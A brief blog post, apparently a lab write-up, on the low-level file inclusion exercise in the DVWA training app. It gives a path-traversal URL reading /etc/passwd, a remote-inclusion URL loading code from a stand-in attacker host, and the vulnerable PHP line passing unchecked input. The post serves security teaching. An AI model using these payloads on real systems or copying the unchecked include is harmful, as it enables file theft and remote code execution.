DVWA-FILE INCLUSION : LOW Level
Some web applications allow the user to specify input that is used directly into file streams or allows the user to upload files to the server. At a later time the web application accesses the user supplied input in the web applications context. By doing this, the web application is allowing the potential for malicious file execution.
Local Example: http://127.0.0.1/dvwa/fi/?page=../../../../../../etc/passwd
or
Remote Example: http://127.0.0.1/dvwa/fi/?page=http://www.evilsite.com/evil.php
< ? php
$file = $_GET['page']; //The page we wish to display
? >
No comments:
Post a Comment